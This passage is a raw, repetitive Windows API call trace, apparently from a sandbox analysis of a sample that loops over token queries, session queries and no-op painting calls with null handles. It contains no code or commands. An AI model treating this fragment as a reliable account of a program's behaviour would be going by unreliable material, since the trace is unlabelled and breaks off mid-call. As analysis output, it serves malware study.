0 [0072.773] GetTickCount () returned 0x1f47d [0072.774] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.774] SetForegroundWindow (hWnd=0x0) returned 0 [0072.774] BringWindowToTop (hWnd=0x0) returned 0 [0072.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x868) returned 1 [0072.774] GetTokenInformation (in: TokenHandle=0x868, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.774] GetLastError () returned 0x7a [0072.774] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.774] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.774] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.774] TextOutW (hdc=0x0, x=3974, y=9699, lpString="", c=0) returned 1 [0072.774] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.775] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.775] GetTickCount () returned 0x1f47d [0072.775] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.775] SetForegroundWindow (hWnd=0x0) returned 0 [0072.775] BringWindowToTop (hWnd=0x0) returned 0 [0072.775] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x86c) returned 1 [0072.775] GetTokenInformation (in: TokenHandle=0x86c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.775] GetLastError () returned 0x7a [0072.775] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.775] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.776] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.776] TextOutW (hdc=0x0, x=3984, y=9724, lpString="", c=0) returned 1 [0072.776] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.776] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.776] GetTickCount () returned 0x1f47d [0072.776] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.776] SetForegroundWindow (hWnd=0x0) returned 0 [0072.777] BringWindowToTop (hWnd=0x0) returned 0 [0072.777] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x870) returned 1 [0072.777] GetTokenInformation (in: TokenHandle=0x870, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.777] GetLastError () returned 0x7a [0072.777] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.777] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.777] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.777] TextOutW (hdc=0x0, x=3994, y=9749, lpString="", c=0) returned 1 [0072.777] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.777] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.777] GetTickCount () returned 0x1f47d [0072.778] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.778] SetForegroundWindow (hWnd=0x0) returned 0 [0072.778] BringWindowToTop (hWnd=0x0) returned 0 [0072.778] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x874) returned 1 [0072.778] GetTokenInformation (in: TokenHandle=0x874, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.778] GetLastError () returned 0x7a [0072.778] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.778] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.778] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.778] TextOutW (hdc=0x0, x=4004, y=9774, lpString="", c=0) returned 1 [0072.778] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.778] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.778] GetTickCount () returned 0x1f47d [0072.779] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.779] SetForegroundWindow (hWnd=0x0) returned 0 [0072.779] BringWindowToTop (hWnd=0x0) returned 0 [0072.779] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x878) returned 1 [0072.779] GetTokenInformation (in: TokenHandle=0x878, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.779] GetLastError () returned 0x7a [0072.779] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.779] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.779] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.780] TextOutW (hdc=0x0, x=4014, y=9799, lpString="", c=0) returned 1 [0072.780] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.780] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.780] GetTickCount () returned 0x1f47d [0072.780] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.780] SetForegroundWindow (hWnd=0x0) returned 0 [0072.780] BringWindowToTop (hWnd=0x0) returned 0 [0072.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x87c) returned 1 [0072.780] GetTokenInformation (in: TokenHandle=0x87c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.780] GetLastError () returned 0x7a [0072.780] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.780] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.781] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.781] TextOutW (hdc=0x0, x=4024, y=9824, lpString="", c=0) returned 1 [0072.781] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.781] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.781] GetTickCount () returned 0x1f47d [0072.781] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.781] SetForegroundWindow (hWnd=0x0) returned 0 [0072.781] BringWindowToTop (hWnd=0x0) returned 0 [0072.781] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x880) returned 1 [0072.781] GetTokenInformation (in: TokenHandle=0x880, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.781] GetLastError () returned 0x7a [0072.781] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.781] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.782] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.782] TextOutW (hdc=0x0, x=4034, y=9849, lpString="", c=0) returned 1 [0072.782] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.782] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.782] GetTickCount () returned 0x1f47d [0072.782] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.782] SetForegroundWindow (hWnd=0x0) returned 0 [0072.782] BringWindowToTop (hWnd=0x0) returned 0 [0072.782] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x884) returned 1 [0072.782] GetTokenInformation (in: TokenHandle=0x884, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.782] GetLastError () returned 0x7a [0072.783] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.783] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.783] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.783] TextOutW (hdc=0x0, x=4044, y=9874, lpString="", c=0) returned 1 [0072.783] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.783] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.783] GetTickCount () returned 0x1f47d [0072.783] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.783] SetForegroundWindow (hWnd=0x0) returned 0 [0072.784] BringWindowToTop (hWnd=0x0) returned 0 [0072.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x888) returned 1 [0072.784] GetTokenInformation (in: TokenHandle=0x888, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.784] GetLastError () returned 0x7a [0072.784] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.784] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.802] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.802] TextOutW (hdc=0x0, x=4054, y=9899, lpString="", c=0) returned 1 [0072.802] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.802] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.803] GetTickCount () returned 0x1f49c [0072.803] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.803] SetForegroundWindow (hWnd=0x0) returned 0 [0072.803] BringWindowToTop (hWnd=0x0) returned 0 [0072.803] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x88c) returned 1 [0072.803] GetTokenInformation (in: TokenHandle=0x88c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.803] GetLastError () returned 0x7a [0072.803] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.803] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.804] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.804] TextOutW (hdc=0x0, x=4064, y=9924, lpString="", c=0) returned 1 [0072.804] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.804] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.804] GetTickCount () returned 0x1f49c [0072.805] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.805] SetForegroundWindow (hWnd=0x0) returned 0 [0072.805] BringWindowToTop (hWnd=0x0) returned 0 [0072.805] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x890) returned 1 [0072.805] GetTokenInformation (in: TokenHandle=0x890, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.805] GetLastError () returned 0x7a [0072.805] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.805] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.806] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.806] TextOutW (hdc=0x0, x=4074, y=9949, lpString="", c=0) returned 1 [0072.806] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.806] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.806] GetTickCount () returned 0x1f49c [0072.806] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.806] SetForegroundWindow (hWnd=0x0) returned 0 [0072.806] BringWindowToTop (hWnd=0x0) returned 0 [0072.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x894) returned 1 [0072.806] GetTokenInformation (in: TokenHandle=0x894, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.806] GetLastError () returned 0x7a [0072.806] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.806] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.807] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.807] TextOutW (hdc=0x0, x=4084, y=9974, lpString="", c=0) returned 1 [0072.807] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.807] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.807] GetTickCount () returned 0x1f49c [0072.807] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.808] SetForegroundWindow (hWnd=0x0) returned 0 [0072.808] BringWindowToTop (hWnd=0x0) returned 0 [0072.808] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x898) returned 1 [0072.808] GetTokenInformation (in: TokenHandle=0x898, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.808] GetLastError () returned 0x7a [0072.808] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.808] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.808] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.808] TextOutW (hdc=0x0, x=4094, y=9999, lpString="", c=0) returned 1 [0072.808] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.809] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.809] GetTickCount () returned 0x1f49c [0072.809] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.809] SetForegroundWindow (hWnd=0x0) returned 0 [0072.809] BringWindowToTop (hWnd=0x0) returned 0 [0072.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x89c) returned 1 [0072.809] GetTokenInformation (in: TokenHandle=0x89c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.809] GetLastError () returned 0x7a [0072.809] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.809] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.810] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.810] TextOutW (hdc=0x0, x=4104, y=10024, lpString="", c=0) returned 1 [0072.810] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.810] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.810] GetTickCount () returned 0x1f49c [0072.810] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.810] SetForegroundWindow (hWnd=0x0) returned 0 [0072.810] BringWindowToTop (hWnd=0x0) returned 0 [0072.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8a0) returned 1 [0072.811] GetTokenInformation (in: TokenHandle=0x8a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.811] GetLastError () returned 0x7a [0072.811] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.811] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.811] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.811] TextOutW (hdc=0x0, x=4114, y=10049, lpString="", c=0) returned 1 [0072.811] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.811] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.811] GetTickCount () returned 0x1f49c [0072.812] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.812] SetForegroundWindow (hWnd=0x0) returned 0 [0072.812] BringWindowToTop (hWnd=0x0) returned 0 [0072.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8a4) returned 1 [0072.812] GetTokenInformation (in: TokenHandle=0x8a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.812] GetLastError () returned 0x7a [0072.812] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.812] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.813] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.813] TextOutW (hdc=0x0, x=4124, y=10074, lpString="", c=0) returned 1 [0072.813] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.813] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.813] GetTickCount () returned 0x1f49c [0072.813] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.813] SetForegroundWindow (hWnd=0x0) returned 0 [0072.813] BringWindowToTop (hWnd=0x0) returned 0 [0072.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8a8) returned 1 [0072.813] GetTokenInformation (in: TokenHandle=0x8a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.814] GetLastError () returned 0x7a [0072.814] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.814] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.814] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.814] TextOutW (hdc=0x0, x=4134, y=10099, lpString="", c=0) returned 1 [0072.814] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.814] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.814] GetTickCount () returned 0x1f49c [0072.815] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.815] SetForegroundWindow (hWnd=0x0) returned 0 [0072.815] BringWindowToTop (hWnd=0x0) returned 0 [0072.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8ac) returned 1 [0072.815] GetTokenInformation (in: TokenHandle=0x8ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.815] GetLastError () returned 0x7a [0072.815] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.815] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.816] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.816] TextOutW (hdc=0x0, x=4144, y=10124, lpString="", c=0) returned 1 [0072.816] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.816] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.816] GetTickCount () returned 0x1f4ab [0072.816] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.816] SetForegroundWindow (hWnd=0x0) returned 0 [0072.816] BringWindowToTop (hWnd=0x0) returned 0 [0072.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8b0) returned 1 [0072.817] GetTokenInformation (in: TokenHandle=0x8b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.817] GetLastError () returned 0x7a [0072.817] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.817] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.817] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.817] TextOutW (hdc=0x0, x=4154, y=10149, lpString="", c=0) returned 1 [0072.817] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.817] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.817] GetTickCount () returned 0x1f4ab [0072.817] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.817] SetForegroundWindow (hWnd=0x0) returned 0 [0072.817] BringWindowToTop (hWnd=0x0) returned 0 [0072.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8b4) returned 1 [0072.818] GetTokenInformation (in: TokenHandle=0x8b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.818] GetLastError () returned 0x7a [0072.818] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.818] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.818] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.818] TextOutW (hdc=0x0, x=4164, y=10174, lpString="", c=0) returned 1 [0072.818] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.818] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.818] GetTickCount () returned 0x1f4ab [0072.818] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.819] SetForegroundWindow (hWnd=0x0) returned 0 [0072.819] BringWindowToTop (hWnd=0x0) returned 0 [0072.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8b8) returned 1 [0072.819] GetTokenInformation (in: TokenHandle=0x8b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.819] GetLastError () returned 0x7a [0072.819] SetupDiDestroyDriverInfoList 